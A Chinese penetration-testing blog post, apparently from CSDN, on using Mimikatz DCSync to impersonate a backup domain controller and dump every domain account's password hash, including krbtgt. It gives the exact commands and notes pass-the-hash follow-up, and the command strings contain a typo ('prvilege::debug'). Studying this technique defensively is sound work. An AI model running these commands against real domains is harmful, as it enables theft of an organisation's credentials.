渗透测试——域管用户冒充备份域控获取ntds.dit

最新推荐文章于 2024-06-19 19:49:59 发布
最新推荐文章于 2024-06-19 19:49:59 发布
阅读量223 收藏
点赞数 12
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74171325/article/details/139799560
版权

目录

 使用以下命令判断用户权限

 判断是域管用户

使用Mimikatz工具冒充备份域控进行获取ntds.dit

查看某用户的详细信息

 使用以下命令判断用户权限

#administrator是通过whoami获取的
net user administrator /domain

 判断是域管用户

使用Mimikatz工具冒充备份域控进行获取ntds.dit

  1. 攻击者获得管理员及以上权限后,可以使用Mimikatz等工具模拟Active Directory域控制器
  2. 然后攻击者使用DCSync命令,在目标域控制器上请求某个指定帐户的NTLM存储凭证密码哈希值,而无需提供该帐户的明文密码。但是攻击者需要知道目标帐户的名称,以及目标系统的域名和管理员凭据。
  3. 目标域控制器接收到此请求后,将密码哈希值返回给攻击者。
  4. 攻击者可以使用获得的密码哈希值来执行其他攻击,例如Pass-the-Hash攻击,这种攻击技术允许攻击者使用哈希值进行身份验证并获取对系统的访问权限,而无需知道实际的明文密码。此外,攻击者也可以尝试破解密码哈希值以获得明文密码。
mimikatz.exe "prvilege::debug" "lsadump::dcsync /domain:crazy.com /all /csv" "exit"

 成功读取hash

查看某用户的详细信息

mimikatz.exe  "prvilege::debug"  "lsadump::dcsync /domain:crazy.com /user:krbtgt" "exit"

peiqi_crazy
关注
  • 12
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
域之ntds.dit
SecINAdmin的博客
11-26 1351
ntds.ditntds.dit为ad的数据库(C:\Windows\NTDS),内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控用户(如域管用户、DC本地管理员用户)可以访问。ntds.dit包括三个主要表:数据表、链接表、sd表。所以只要在域渗透中能够获取ntds.dit就可以获取到所有域用户用户名和对应的hash,ntds.dit是加密的,需要获取system来解密。查看dit数据库可使用https://github.com/yosqueoy/ditsna
DPAT:渗透测试者的域密码审核工具
05-04
dpat.py -n customer.ntds -c hashcat.potfile -g " Domain Admins.txt " " Enterprise Admins.txt " 这两个必需的参数是从域控制器-n提取的哈希值,以及由Hashcat或JohnTheRipper之类的工具生成的破解密码列表-c ...
服务器渗透文件,域渗透——获得域控服务器的NTDS.dit文件
weixin_39603217的博客
08-03 518
0x00 前言在之前的文章《导出当前域内所有用户hash的技术整理》曾介绍过通过Volume Shadow Copy实现对ntds.dit文件的复制, 可用来导出域内所有用户hash。本文将尝试做系统总结,总结多种不同的方法。0x01 简介本文将要介绍以下内容:多种实现方法比较优缺点0x02 通过Volume Shadow Copy获得域控服务器NTDS.dit文件测试系统:Server 2008...
域渗透之获得域控服务器的NTDS.dit文件
cj_Hydra's Blog
02-15 1977
前言: ntds.dit是主要的AD数据库,存放在c:\windows\NTDS\NTDS.dit,包括有关域用户,组和成员身份的信息,它还包括域中所有用户的密码哈希值,为了进一步保护哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。 因为这两个文件属于系统特殊文件,不能直接复制粘贴,所以需要用特殊的方式来复制粘贴。 当我们拿到域控的权限后,我们可以跑域内所有的hash值,...
域控安全 ----> Ntds.dit文件抓取
huohaowen的博客
05-05 1405
大家还记得内网渗透的初衷吗???找到域馆,拿下域控!!拿下了域控就是拿下了整个域!!但是大家知道拿下域环境之后应该怎么操作吗(灵魂拷问)???那么下面,开始我们今天的内容 NTDS.DIT文件!!
8、域渗透——获得域控服务器的NTDS.dit文件
Fly_鹏程万里
06-11 2841
0x00 前言在之前的文章《导出当前域内所有用户hash的技术整理》曾介绍过通过Volume Shadow Copy实现对ntds.dit文件的复制,可用来导出域内所有用户hash。本文将尝试做系统总结,总结多种不同的方法。0x01 简介本文将要介绍以下内容:多种实现方法比较优缺点0x02 通过Volume Shadow Copy获得域控服务器NTDS.dit文件测试系统:Server 2008 ...
ntds.dit 获取域内用户ntlm hash
qq_46635165的博客
11-17 2100
前提:在获取域控权限后,可以通过读取ntds.dit 获取域内更多资产信息 概念: 在活动目录中,所有域内数据都保存在ntds.dit中,存储位置为 %SystemRoot%\ntds\ntds.dit,ntds.dit中包含用户名,散列值,组,OU,GPP等活动目录相关信息; 在域控主机中默认自带了ntdsutil.exe ,是一个为活动目录提供管理机制的程序,使用ntdsutil.exe 用于维护活动目录等,ntdsutil.exe 支持的操作系统有win2003,win2008,win2012; 目
[内网渗透]—卷影拷贝提取ntds.dit
Sentiment的博客
12-08 847
ntds.dit文件是一个数据库,用于存储Active Directory数据,包括有关用户对象,组和组成员身份的信息。它包括域中所有用户的密码哈希。通过提取这些哈希值,可以使用诸如Mimikatz之类的工具执行哈希传递攻击,或使用诸如Hashcat之类的工具来破解这些密码。这些密码的提取和破解可以脱机执行,因此将无法检测到。一旦攻击者提取了这些散列,它们便可以充当域上的任何用户,包括域管理员。在活动目录中,所有的数据都保存在ntds.dit中。
渗透测试——卷影复制服务下载NTDS.dit(拿到域控
weixin_74171325的博客
06-16 140
记住这三信息Shadow copy device name、SnapshotSetID、SNAPSHOT ID。在域控的情况下,由于ntds.dit在使用,所以它不能进行移动下载到桌面更不能拿出来,下面解释两种方式。出现和C盘一样的快照,这样就可以进快照获取ntds.dit了。ntdsutil按步骤执行命令创建快照。成功获取到,可以进行下载。
域控制器中提取Active Directory数据库(NTDS.DIT)
Ping_Pig的博客
10-23 2380
目录 讲在前面: 本地安全机构子系统服务(LSASS) 场景思考 注意 ntds.dit介绍:https://blog.csdn.net/qq_41874930/article/details/108141331 部分方法如下: 使用NTDSUtil的Create IFM在DC上本地捕获ntds.dit文件 使用VSS卷影副本远程拉ntds.dit 使用PowerSploit的Invoke-NinjaCopy远程拉ntds.dit(需要在目标DC上启用PowerShell远程处理) 注意
域控服务器备份和恢复.doc
09-30
其中,AD数据库由Ntds.dit(主数据库)、Edbxxxxx.log(事务日志)、Edb.chk(检查点文件)、Res1.log和Res2.log(预留日志文件)组成。SYSVOL包含文件系统连接、Net Logon共享、用户登录脚本和组策略对象。 备份...
域控备份恢复
07-01
其中 AD 数据库包括 Ntds.dit(数据库)、Edbxxxxx.log(事物日志)、Edb.chk(检查点文件)、Res1.log 和 Res2.log(预留的日志文件);系统卷包括文件系统联接、Net Logon 共享(保存着基于非 Windows2000/2003/xp...
备份和还原WindowsServerADDS.pdf
10-01
关键卷包括系统卷(存储Bootmgr文件和BCD存储)、引导卷(包含Windows操作系统和注册表)、SYSVOL树卷、AD数据库卷(ntds.dit)以及AD数据库日志文件卷。这些卷的备份是确保ADDS完整性的基础。在Windows Server ...
如何从零开始内网渗透学习.pdf
04-29
libesedb 的搭建: ...tar zxvf libesedb-experimental-20151213.tar.gz cd libesedb-20151213/ ./configure make cd esedbtools/ (需要把刚刚 vbs 脱下来的 ntds.dit 放到 kali) ...mv ntds.dit.export/ ../../
安全】Linux Fanotify使用入门
追寻梦想的青春
06-19 434
fanotify是另一种文件监控机制,在使用上两者类似,都是先调用init函数初始化句柄,然后调用类似watch的函数添加监控路径,再使用select+read的方式读取出变化的事件,根据事件中给出的参数获取文件的路径、事件类型以及其他需要的数据。如果是监控主机上的路径,directed结合FAN_EVENT_ON_CHILD标志就只能监控目录以及目录下的文件,per-mount可以监控pathname所在的挂载点中所有文件或者目录的变化,而global模式可以监控整个文件系统。
前端开发之浏览器安全
最新发布
weixin_45511682的博客
06-19 817
浏览器安全,#XSS攻击、CSRF攻击、中间人攻击、前端安全问题与防范、网络劫持防范
NTFS安全权限
2302_80097039的博客
06-12 790
NTFS权限是基于。
SSL证书怎样配置部署更安全
2301_77689616的博客
06-19 115
可以考虑使用自动化的证书管理工具,如Certbot或Let's Encrypt,来自动化证书的颁发和更新过程,减少人为操作的疏漏。通过使用强大的加密算法、强制HTTPS、定期更新SSL证书、配置安全的服务器环境和进行安全的证书管理,可以帮助网站管理员更好地保护网站的安全。可以考虑使用证书管理工具来集中管理证书,定期检查证书的有效期和状态,以及证书的使用情况,确保证书的有效性和安全性。它通过建立安全的连接,确保网站的身份和保护用户的隐私,是网站安全的重要组成部分。5.进行安全的证书管理。
怎么解析NTDS.dit
04-27
NTDS.dit是Windows操作系统中Active Directory数据库文件的一部分。要解析NTDS.dit文件,可以使用工具如dsdbutil、ntdsutil和esentutl等。这些工具可以帮助管理员执行各种操作,例如备份和还原数据库、重建索引、检查数据库状态等。此外,可以使用一些第三方工具进行NTDS.dit文件的解析,例如Active Directory解析器和LDP工具等。这些工具可以让管理员更方便地查看和管理Active Directory数据库文件。请注意,解析NTDS.dit文件需要具备一定的技术知识和经验,并且需要谨慎执行相关操作,以避免意外损坏数据库文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

peiqi_crazy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值